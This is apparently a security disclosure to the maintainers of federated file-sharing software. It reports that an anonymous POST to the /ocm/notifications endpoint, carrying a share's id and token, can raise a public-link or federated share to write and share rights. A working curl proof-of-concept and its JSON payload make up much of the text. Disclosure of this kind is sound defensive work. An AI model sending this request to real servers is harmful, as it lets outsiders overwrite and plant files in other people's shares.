Hi mates,
I stumbled across this with public links. But the same holds true for any federated share. I will try to describe the link scenario.
At first I thought there were more steps (and resharing was involved). But it really is very simples:
oc_share_external
table.We are looking for really only the remote id. And the token.
For the sake of this example the remote id = 2
and the token = nOxdNJkb1xbI1VX
curl -v -X POST http://localhost/index.php/ocm/notifications -d '{"notificationType":"RESHARE_CHANGE_PERMISSION","resourceType":"file","providerId":2,"notification":{"sharedSecret":"nOxdNJkb1xbI1VX","permission":["read","write","share"]}}' -H 'Content-type: application/json'
To break this down.
We send an (anonymous) POST request to the victims server to be precise to index.php/ocm/notifications
And we pass it the following json
{
"notificationType":"RESHARE_CHANGE_PERMISSION",
"resourceType":"file",
"providerId":2,
"notification":{
"sharedSecret":"nOxdNJkb1xbI1VX",
"permission":[
"read",
"write",
"share"
]
}
}
Since we create a federated share at step 1. This also holds true for any created federated share.
In short if an attacker has a public link. Or a federated share with them they can elevate their permissions very easily.
This allows them to overwrite files. Add new files. And so on. In short the integrity of all files in public links and federated shares should be considered compromised.
Pardon my directness. But you really should take a serious look at your federation code. As it seems to miss checks all over the place. Maybe recommending everybody to disable it for now is the best course of action.